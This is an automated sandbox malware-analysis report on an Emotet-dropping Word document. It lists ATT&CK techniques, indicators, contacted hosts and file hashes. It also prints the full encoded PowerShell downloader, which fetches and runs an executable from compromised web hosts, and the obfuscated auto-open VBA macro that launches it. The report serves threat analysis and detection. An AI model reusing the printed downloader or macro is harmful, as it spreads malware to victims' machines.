Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'ATTACHMENT 654860 I32560.doc'

malicious

Threat Score: 100/100 AV Detection: 42% Labeled as: Trojan.Generic #macros-on-open

ATTACHMENT 654860 I32560.doc

This report is generated from a file or URL submitted to this webservice on May 29th 2019 15:22:53 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before Show Similar Samples Request Report Deletion

Incident Response

Risk Assessment

Persistence: Spawns a lot of processes
Network Behavior: Contacts 2 domains and 2 hosts. View all details

MITRE ATT&CK™ Techniques Detection

This report has 18 indicators that were mapped to 15 attack techniques and 7 tactics. View all details

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Drive-by Compromise	AppleScript	.bash_profile and .bashrc	Access Token Manipulation	Access Token Manipulation	Account Manipulation	Account Discovery	AppleScript	Audio Capture	Commonly Used Port	Automated Exfiltration	Data Destruction
Exploit Public-Facing Application	CMSTP	Accessibility Features	Accessibility Features	Binary Padding	Bash History	Application Window Discovery 1	Application Deployment Software	Automated Collection	Communication Through Removable Media	Data Compressed	Data Encrypted for Impact
External Remote Services	Command-Line Interface	Account Manipulation	AppCert DLLs	BITS Jobs	Brute Force	Browser Bookmark Discovery	Distributed Component Object Model	Clipboard Data	Connection Proxy	Data Encrypted	Defacement
Hardware Additions	Compiled HTML File	AppCert DLLs	AppInit DLLs	Bypass User Account Control	Credential Dumping	Domain Trust Discovery	Exploitation of Remote Services	Data from Information Repositories	Custom Command and Control Protocol	Data Transfer Size Limits	Disk Content Wipe
Replication Through Removable Media	Control Panel Items	AppInit DLLs	Application Shimming	Clear Command History	Credentials in Files	File and Directory Discovery	Logon Scripts	Data from Local System	Custom Cryptographic Protocol	Exfiltration Over Alternative Protocol	Disk Structure Wipe
Spearphishing Attachment	Dynamic Data Exchange	Application Shimming	Bypass User Account Control	CMSTP	Credentials in Registry	Network Service Scanning	Pass the Hash	Data from Network Shared Drive	Data Encoding	Exfiltration Over Command and Control Channel	Endpoint Denial of Service
Spearphishing Link	Execution through API	Authentication Package	DLL Search Order Hijacking	Code Signing	Exploitation for Credential Access	Network Share Discovery	Pass the Ticket	Data from Removable Media	Data Obfuscation	Exfiltration Over Other Network Medium	Firmware Corruption
Spearphishing via Service	Execution through Module Load	BITS Jobs	Dylib Hijacking	Compile After Delivery	Forced Authentication	Network Sniffing	Remote Desktop Protocol	Data Staged	Domain Fronting	Exfiltration Over Physical Medium	Inhibit System Recovery
Supply Chain Compromise	Exploitation for Client Execution	Bootkit	Exploitation for Privilege Escalation	Compiled HTML File	Hooking 3	Password Policy Discovery	Remote File Copy	Email Collection 1	Domain Generation Algorithms	Scheduled Transfer	Network Denial of Service
Trusted Relationship	Graphical User Interface	Browser Extensions	Extra Window Memory Injection	Component Firmware	Input Capture	Peripheral Device Discovery 1 1	Remote Services	Input Capture	Fallback Channels		Resource Hijacking
Valid Accounts	InstallUtil	Change Default File Association	File System Permissions Weakness	Component Object Model Hijacking	Input Prompt	Permission Groups Discovery	Replication Through Removable Media	Man in the Browser	Multi-hop Proxy		Runtime Data Manipulation
	Launchctl	Component Firmware	Hooking 3	Control Panel Items	Kerberoasting	Process Discovery	Shared Webroot	Screen Capture	Multi-Stage Channels		Service Stop
	Local Job Scheduling	Component Object Model Hijacking	Image File Execution Options Injection	DCShadow	Keychain	Query Registry	SSH Hijacking	Video Capture	Multiband Communication		Stored Data Manipulation
	LSASS Driver	Create Account	Launch Daemon	Deobfuscate/Decode Files or Information	LLMNR/NBT-NS Poisoning and Relay	Remote System Discovery	Taint Shared Content		Multilayer Encryption		Transmitted Data Manipulation
	Mshta	DLL Search Order Hijacking	New Service 1	Disabling Security Tools	Network Sniffing	Security Software Discovery	Third-party Software		Port Knocking
	PowerShell	Dylib Hijacking	Path Interception	DLL Search Order Hijacking	Password Filter DLL	System Information Discovery 1	Windows Admin Shares		Remote Access Tools
	Regsvcs/Regasm	External Remote Services	Plist Modification	DLL Side-Loading	Private Keys	System Network Configuration Discovery	Windows Remote Management		Remote File Copy
	Regsvr32	File System Permissions Weakness	Port Monitors	Execution Guardrails	Securityd Memory	System Network Connections Discovery			Standard Application Layer Protocol
	Rundll32	Hidden Files and Directories	Process Injection 1 1 1	Exploitation for Defense Evasion	Two-Factor Authentication Interception	System Owner/User Discovery			Standard Cryptographic Protocol
	Scheduled Task	Hooking 3	Scheduled Task	Extra Window Memory Injection		System Service Discovery			Standard Non-Application Layer Protocol
	Scripting	Hypervisor	Service Registry Permissions Weakness	File Deletion		System Time Discovery			Uncommonly Used Port
	Service Execution 2	Image File Execution Options Injection	Setuid and Setgid	File Permissions Modification		Virtualization/Sandbox Evasion			Web Service
	Signed Binary Proxy Execution	Kernel Modules and Extensions 1	SID-History Injection	File System Logical Offsets
	Signed Script Proxy Execution	Launch Agent	Startup Items	Gatekeeper Bypass
	Source	Launch Daemon	Sudo	Group Policy Modification
	Space after Filename	Launchctl	Sudo Caching	Hidden Files and Directories
	Third-party Software	LC_LOAD_DYLIB Addition	Valid Accounts	Hidden Users
	Trap	Local Job Scheduling	Web Shell	Hidden Window
	Trusted Developer Utilities	Login Item		HISTCONTROL
	User Execution	Logon Scripts		Image File Execution Options Injection
	Windows Management Instrumentation	LSASS Driver		Indicator Blocking
	Windows Remote Management	Modify Existing Service		Indicator Removal from Tools
	XSL Script Processing	Netsh Helper DLL		Indicator Removal on Host
		New Service 1		Indirect Command Execution
		Office Application Startup 1		Install Root Certificate
		Path Interception		InstallUtil
		Plist Modification		Launchctl
		Port Knocking		LC_MAIN Hijacking
		Port Monitors		Masquerading
		Rc.common		Modify Registry 2
		Re-opened Applications		Mshta
		Redundant Access		Network Share Connection Removal
		Registry Run Keys / Startup Folder		NTFS File Attributes
		Scheduled Task		Obfuscated Files or Information
		Screensaver		Plist Modification
		Security Support Provider		Port Knocking
		Service Registry Permissions Weakness		Process Doppelgänging
		Setuid and Setgid		Process Hollowing
		Shortcut Modification		Process Injection 1 1 1
		SIP and Trust Provider Hijacking		Redundant Access
		Startup Items		Regsvcs/Regasm
		System Firmware		Regsvr32
		Systemd Service		Rootkit
		Time Providers		Rundll32
		Trap		Scripting
		Valid Accounts		Signed Binary Proxy Execution
		Web Shell		Signed Script Proxy Execution
		Windows Management Instrumentation Event Subscription		SIP and Trust Provider Hijacking
		Winlogon Helper DLL		Software Packing
				Space after Filename
				Template Injection
				Timestomp
				Trusted Developer Utilities
				Valid Accounts
				Virtualization/Sandbox Evasion
				Web Service
				XSL Script Processing

Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Collection
Service Execution 2	Hooking 3	Hooking 3	Modify Registry 2	Hooking 3	Application Window Discovery 1	Email Collection 1
	Kernel Modules and Extensions 1	New Service 1	Process Injection 1 1 1		Peripheral Device Discovery 1 1
	New Service 1	Process Injection 1 1 1			System Information Discovery 1
	Office Application Startup 1

Execution

Service Execution
2

Persistence

Privilege Escalation

Defense Evasion

Process Injection
1

1

1
Modify Registry
2

Credential Access

Hooking
3

Discovery

Collection

Email Collection
1

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 16
Anti-Detection/Stealthyness
- Compound file contains data exceeding the last FAT sector (overlay)
  
  details
  
  "8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin" has "1263190" bytes of overlay at offset "18834"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
External Systems
- Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
  
  details
  
  7/67 reputation engines marked "http://lastminutelollipop.com" as malicious (10% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1120 (Show technique in the MITRE ATT&CK™ matrix)
- Sample was identified as malicious by a large number of Antivirus engines
  
  details
  
  15/60 Antivirus vendors marked sample as malicious (25% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  15/60 Antivirus vendors marked sample as malicious (25% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- The analysis extracted a file that was identified as malicious
  
  details
  
  24/72 Antivirus vendors marked dropped file "936.exe" as malicious (classified as "Emotet.TP.gen" with 33% detection rate)
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- The analysis spawned a process that was identified as malicious
  
  details
  
  24/72 Antivirus vendors marked spawned process "936.exe" (PID: 2888) as malicious (classified as "Emotet.TP.gen" with 33% detection rate)
  24/72 Antivirus vendors marked spawned process "936.exe" (PID: 2932) as malicious (classified as "Emotet.TP.gen" with 33% detection rate)
  24/72 Antivirus vendors marked spawned process "enablerouting.exe" (PID: 272) as malicious (classified as "Emotet.TP.gen" with 33% detection rate)
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
Installation/Persistance
- Writes data to a remote process
  
  details
  
  "powershell.exe" wrote 32 bytes to a remote process "%USERPROFILE%\936.exe" (Handle: 1056)
  "powershell.exe" wrote 52 bytes to a remote process "%USERPROFILE%\936.exe" (Handle: 1056)
  "powershell.exe" wrote 4 bytes to a remote process "%USERPROFILE%\936.exe" (Handle: 1056)
  "936.exe" wrote 32 bytes to a remote process "%USERPROFILE%\936.exe" (Handle: 164)
  "936.exe" wrote 52 bytes to a remote process "%USERPROFILE%\936.exe" (Handle: 164)
  "936.exe" wrote 4 bytes to a remote process "%USERPROFILE%\936.exe" (Handle: 164)
  
  source
  
  API Call
  
  relevance
  
  6/10
  
  ATT&CK ID
  
  T1055 (Show technique in the MITRE ATT&CK™ matrix)
Network Related
- Malicious artifacts seen in the context of a contacted host
  
  details
  
  Found malicious artifacts related to "68.183.65.234": ...
  
  URL: http://ceo.calcus.com/ (AV positives: 1/66 scanned on 05/29/2019 15:00:22)
  URL: http://ceo.calcus.com/postnewo/rwhvolzis (AV positives: 2/66 scanned on 05/29/2019 14:41:25)
  URL: http://ceo.calcus.com/postnewo/RwhvOlZIs (AV positives: 4/71 scanned on 05/29/2019 13:50:16)
  URL: http://ceo.calcus.com/postnewo/RwhvOlZIs/ (AV positives: 3/66 scanned on 05/29/2019 13:53:47)
  File SHA256: 7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6 (AV positives: 24/73 scanned on 05/29/2019 13:43:20)
  File SHA256: 88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648 (AV positives: 15/72 scanned on 05/29/2019 13:58:25)
  Found malicious artifacts related to "158.69.127.22": ...
  
  URL: http://lastminutelollipop.com/wp-admin/inc/s48v4ay1b83tko_a2sdiq6-250133534/ (AV positives: 10/67 scanned on 05/29/2019 15:20:40)
  URL: http://lastminutelollipop.com/ (AV positives: 7/67 scanned on 05/29/2019 15:20:00)
  URL: http://lastminutelollipop.com/wp-admin/aeqlppdlfo/ (AV positives: 10/70 scanned on 05/29/2019 15:14:36)
  URL: http://lastminutelollipop.com/wp-admin/aEQlppdlfo (AV positives: 9/71 scanned on 05/29/2019 14:50:22)
  URL: http://lastminutelollipop.com/wp-admin/aEQlppdlfo/ (AV positives: 8/67 scanned on 05/29/2019 14:39:11)
  File SHA256: 7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6 (AV positives: 24/73 scanned on 05/29/2019 13:43:20)
  File SHA256: 88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648 (AV positives: 15/72 scanned on 05/29/2019 13:58:25)
  File SHA256: 52113ec28c47265a473c2970d769c75baac1058bb9b5e3ec457e0c4f3b624c37 (AV positives: 38/72 scanned on 05/26/2019 14:04:42)
  File SHA256: e3bc63109b54ad59d61c2456ffdd5c0779b7eb114b4a5f94011657d7de51557c (AV positives: 22/73 scanned on 05/23/2019 03:35:59)
  File SHA256: d1cb2cffa33d9c0e47875ddf2aff4ac69288fd6a5308b27773a92e1d367d2804 (AV positives: 17/59 scanned on 05/23/2019 01:29:02)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
- Multiple malicious artifacts seen in the context of different hosts
  
  details
  
  Found malicious artifacts related to "68.183.65.234": ...
  
  URL: http://ceo.calcus.com/ (AV positives: 1/66 scanned on 05/29/2019 15:00:22)
  URL: http://ceo.calcus.com/postnewo/rwhvolzis (AV positives: 2/66 scanned on 05/29/2019 14:41:25)
  URL: http://ceo.calcus.com/postnewo/RwhvOlZIs (AV positives: 4/71 scanned on 05/29/2019 13:50:16)
  URL: http://ceo.calcus.com/postnewo/RwhvOlZIs/ (AV positives: 3/66 scanned on 05/29/2019 13:53:47)
  File SHA256: 7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6 (AV positives: 24/73 scanned on 05/29/2019 13:43:20)
  File SHA256: 88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648 (AV positives: 15/72 scanned on 05/29/2019 13:58:25)
  Found malicious artifacts related to "158.69.127.22": ...
  
  URL: http://lastminutelollipop.com/wp-admin/inc/s48v4ay1b83tko_a2sdiq6-250133534/ (AV positives: 10/67 scanned on 05/29/2019 15:20:40)
  URL: http://lastminutelollipop.com/ (AV positives: 7/67 scanned on 05/29/2019 15:20:00)
  URL: http://lastminutelollipop.com/wp-admin/aeqlppdlfo/ (AV positives: 10/70 scanned on 05/29/2019 15:14:36)
  URL: http://lastminutelollipop.com/wp-admin/aEQlppdlfo (AV positives: 9/71 scanned on 05/29/2019 14:50:22)
  URL: http://lastminutelollipop.com/wp-admin/aEQlppdlfo/ (AV positives: 8/67 scanned on 05/29/2019 14:39:11)
  File SHA256: 7221a5ac575f1c4812be871a2ba7cfaf793d95e510e330da59fe5329dda3fcb6 (AV positives: 24/73 scanned on 05/29/2019 13:43:20)
  File SHA256: 88edc52a1ab13b3d74205b0ba6db9cc9e27050d9d4cf0e1e266ac3b252dc8648 (AV positives: 15/72 scanned on 05/29/2019 13:58:25)
  File SHA256: 52113ec28c47265a473c2970d769c75baac1058bb9b5e3ec457e0c4f3b624c37 (AV positives: 38/72 scanned on 05/26/2019 14:04:42)
  File SHA256: e3bc63109b54ad59d61c2456ffdd5c0779b7eb114b4a5f94011657d7de51557c (AV positives: 22/73 scanned on 05/23/2019 03:35:59)
  File SHA256: d1cb2cffa33d9c0e47875ddf2aff4ac69288fd6a5308b27773a92e1d367d2804 (AV positives: 17/59 scanned on 05/23/2019 01:29:02)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  
  details
  
  Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1137 (Show technique in the MITRE ATT&CK™ matrix)
- Spawns a lot of processes
  
  details
  
  Spawned process "WINWORD.EXE" with commandline "/n "C:\ATTACHMENT654860I32560.doc"" (Show Process)
  Spawned process "powershell.exe" with commandline "powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AHAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwAnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsAJABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcABiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAOwAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMAVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA==" (Show Process)
  Spawned process "936.exe" (Show Process)
  Spawned process "936.exe" with commandline "--26d066e0" (Show Process)
  Spawned process "enablerouting.exe" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  8/10
Hiding 5 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 13
Anti-Detection/Stealthyness
- Contains ability to open/control a service
  
  details
  
  OpenServiceW@ADVAPI32.DLL from 936.exe (PID: 2932) (Show Stream)
  OpenServiceW@ADVAPI32.DLL from 936.exe (PID: 2932) (Show Stream)
  OpenServiceW@ADVAPI32.DLL from 936.exe (PID: 2932) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  8/10
  
  ATT&CK ID
  
  T1035 (Show technique in the MITRE ATT&CK™ matrix)
- Possibly tries to hide a process launching it with different user credentials
  
  details
  
  CreateProcessAsUserW@ADVAPI32.DLL from 936.exe (PID: 2932) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  3/10
Environment Awareness
- Contains ability to enumerate services
  
  details
  
  EnumServicesStatusExW@ADVAPI32.DLL from 936.exe (PID: 2932) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  7/10
  
  ATT&CK ID
  
  T1120 (Show technique in the MITRE ATT&CK™ matrix)
- Contains ability to query CPU information
  
  details
  
  cpuid from 936.exe (PID: 2888) (Show Stream)
  cpuid from 936.exe (PID: 2932) (Show Stream)
  cpuid from enablerouting.exe (PID: 272) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1082 (Show technique in the MITRE ATT&CK™ matrix)
External Systems
- Found an IP/URL artifact that was identified as malicious by at least one reputation engine
  
  details
  
  1/66 reputation engines marked "http://ceo.calcus.com" as malicious (1% detection rate)
  7/67 reputation engines marked "http://lastminutelollipop.com" as malicious (10% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
General
- Found a potential E-Mail address in binary/memory
  
  details
  
  Pattern match: "9dppkt@_wk.c"
  
  source
  
  String
  
  relevance
  
  3/10
  
  ATT&CK ID
  
  T1114 (Show technique in the MITRE ATT&CK™ matrix)
- Opened the service control manager
  
  details
  
  "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  "powershell.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  "powershell.exe" called "OpenSCManager" requesting access rights "0X0"
  "936.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ALL_ACCESS" (0xf003f)
  
  source
  
  API Call
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1035 (Show technique in the MITRE ATT&CK™ matrix)
Installation/Persistance
- Allocates virtual memory in a remote process
  
  details
  
  "powershell.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
  
  source
  
  API Call
  
  relevance
  
  7/10
  
  ATT&CK ID
  
  T1055 (Show technique in the MITRE ATT&CK™ matrix)
- Creates new processes
  
  details
  
  "powershell.exe" is creating a new process (Name: "%USERPROFILE%\936.exe", Handle: 1056)
  "936.exe" is creating a new process (Name: "%USERPROFILE%\936.exe", Handle: 164)
  "enablerouting.exe" is creating a new process
  
  source
  
  API Call
  
  relevance
  
  8/10
Network Related
- Sends traffic on typical HTTP outbound port, but without HTTP header
  
  details
  
  TCP traffic to 68.183.65.234 on port 80 is sent without HTTP header
  TCP traffic to 158.69.127.22 on port 80 is sent without HTTP header
  
  source
  
  Network Traffic
  
  relevance
  
  5/10
Spyware/Information Retrieval
- Contains ability to enumerate processes/modules/threads
  
  details
  
  CreateToolhelp32Snapshot@KERNEL32.DLL from 936.exe (PID: 2888) (Show Stream)
  CreateToolhelp32Snapshot@KERNEL32.DLL from 936.exe (PID: 2932) (Show Stream)
  CreateToolhelp32Snapshot@KERNEL32.DLL from enablerouting.exe (PID: 272) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  5/10
  
  ATT&CK ID
  
  T1215 (Show technique in the MITRE ATT&CK™ matrix)
Unusual Characteristics
- Checks for a resource fork (ADS) file
  
  details
  
  "powershell.exe" checked file "C:"
  
  source
  
  API Call
  
  relevance
  
  5/10
- Contains embedded VBA macros with suspicious keywords
  
  details
  
  Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  Found suspicious keyword "ShowWindow" which indicates: "May hide the application"
  
  source
  
  Static Parser
  
  relevance
  
  10/10

Informative 25
Anti-Reverse Engineering
- Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
  
  details
  
  "powershell.exe" is allocating memory with PAGE_GUARD access rights
  
  source
  
  API Call
  
  relevance
  
  10/10
Environment Awareness
- Contains ability to query the machine version
  
  details
  
  RtlGetVersion@NTDLL.DLL from 936.exe (PID: 2888) (Show Stream)
  RtlGetVersion@NTDLL.DLL from 936.exe (PID: 2932) (Show Stream)
  RtlGetVersion@NTDLL.DLL from 936.exe (PID: 2932) (Show Stream)
  RtlGetVersion@NTDLL.DLL from enablerouting.exe (PID: 272) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Possibly tries to detect the presence of a debugger
  
  details
  
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2888) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2888) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2888) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2888) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2932) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2932) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2932) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2932) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 936.exe (PID: 2932) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from enablerouting.exe (PID: 272) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from enablerouting.exe (PID: 272) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from enablerouting.exe (PID: 272) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from enablerouting.exe (PID: 272) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
General
- Contacts domains
  
  details
  
  "lastminutelollipop.com"
  "ceo.calcus.com"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "68.183.65.234:80"
  "158.69.127.22:80"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contains PDB pathways
  
  details
  
  "powershell.pdb"
  
  source
  
  String
  
  relevance
  
  1/10
- Contains embedded VBA macros
  
  details
  
  File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub _
  autoopen( _
  )
  'Debug.Print "Sp4PN8" + ("336" + ("DE1Bs3Z") + "BYOuWo3" + "23") + "AulGwwa" + ("pRzcLQ") + ("vZWjoTbS" + "jTOYMZ" + "685" + ("Y0BNSUG") + ("M8Cia8" + ("IIXaJwt") + "749" + ("806") + ("UFXwTn" + ("469"))))
  Debug.Print "JEMhBQDI" + ("14" + ("PbjPifMT") + "YiEC3F" + "878") + "s8MEbF81" + ("nkuqWw9h") + ("paJkkt" + "ZKLK8R" + "271" + ("THJmqw") + ("ltwtR6j" + ("wbznitfz") + "350" + ("235") + ("jcZZplZ" + ("971"))))
  ddnd2Fp
  'Debug.Print "TvtXFl" + ("942" + ("jjAHCPr") + "JllnbK1" + "70") + "Idh0z_E" + ("RViCoiBh") + ("HdSYdo" + "mTiiAJV" + "294" + ("fNH9Wr") + ("jj9Fao" + ("PI3EDUVi") + "345" + ("574") + ("QYsVX87V" + ("9"))))
  Debug.Print "fwcB4f" + ("640" + ("OE3MaGBR") + "jzPwrO3" + "618") + "k77GCQQ" + ("XCsqhf") + ("a6R6pda" + "TAwzB4" + "922" + ("SJvKK1") + ("Wh6GsSbs" + ("XjCcfis4") + "256" + ("834") + ("IzPVIGw" + ("342"))))
  End Sub"
  File "SbqJsB.cls" (Streampath: "Macros/VBA/SbqJsB") has code: ""
  File "t0pLjB.bas" (Streampath: "Macros/VBA/t0pLjB") has code: ""
  File "Vn3uja.bas" (Streampath: "Macros/VBA/Vn3uja") has code: ""
  File "IRZCT2.bas" (Streampath: "Macros/VBA/IRZCT2") has code: ""
  File "v_EwVS8V.cls" (Streampath: "Macros/VBA/v_EwVS8V") has code: ""
  File "RjMGj4.cls" (Streampath: "Macros/VBA/RjMGj4") has code: ""
  File "wSFzhwwB.cls" (Streampath: "Macros/VBA/wSFzhwwB") has code: ""
  File "ZaojtM.cls" (Streampath: "Macros/VBA/ZaojtM") has code: ""
  File "zt7hFLK.cls" (Streampath: "Macros/VBA/zt7hFLK") has code: ""
  File "vawzMw.bas" (Streampath: "Macros/VBA/vawzMw") has code: "Function ddnd2Fp()
  'Debug.Print "btATfrn" + ("312" + ("Ovh_OnUv") + "dla8Hj" + "930") + "onGf6a" + ("Zzr3QU") + ("wHfEb8_" + "F7SEL0" + "762" + ("uTLQmk") + ("r7iZTRw" + ("Uavt1n") + "41" + ("348") + ("jIT27DG" + ("427"))))
  Debug.Print "jj7zBHE" + ("580" + ("hfwAlVDb") + "H6wFkRjF" + "550") + "sizj4f" + ("ljdmB2LV") + ("iAqXnV" + "sPvl0BYk" + "801" + ("Zs2ItU") + ("PwPY7N19" + ("Z3bvKoq") + "959" + ("140") + ("LbCKUwh" + ("750"))))
  ZNifav_T = ThisDocument.Mwbcw5j + ThisDocument.bZqTui6u + ThisDocument.YsDIDGi
  'Debug.Print "VL1_aWm" + ("409" + ("w33kd3") + "XUJmnaF5" + "927") + "L1VTpDZ" + ("S7mnN7w") + ("i62M9lp" + "da5hbq7Z" + "376" + ("LhEQdch") + ("UrnjZVB" + ("tvoQP2") + "197" + ("441") + ("wrziLBQ" + ("56"))))
  Debug.Print "ljE83Z3" + ("792" + ("EoTXf3") + "ONDCnCz1" + "584") + "ZISLBTW" + ("T1_ZDrYR") + ("CUGTwnh" + "BJCzsW5_" + "807" + ("DIMNkc") + ("z7ojcJF" + ("rjiimdp") + "554" + ("338") + ("CJrkzF" + ("364"))))
  CreateObject(("winmg" _
  + "mts:Win" + _
  "32_Process")).Create# ZNifav_T, lTY4s9Xo, uoNqtU, jPfKS7zd
  'Debug.Print "mfGTzL" + ("711" + ("E47ZQnUt") + "p90fbN" + "546") + "KHDVFUi" + ("FcsAiIJB") + ("mawC4hXT" + "iGQhOi" + "692" + ("rFwpim4") + ("V1Wasr5D" + ("JwtBt9") + "110" + ("13") + ("n_bHiq" + ("773"))))
  Debug.Print "Lb_Ok47p" + ("249" + ("hLGm1uH") + "kblrIB" + "419") + "wC66SO" + ("dIIzT3") + ("bk4zRvi" + "Dz1TFjdi" + "430" + ("ht540oJ") + ("NYk_Embh" + ("JiN_Ocz4") + "488" + ("576") + ("tiP9wr" + ("11"))))
  End Function"
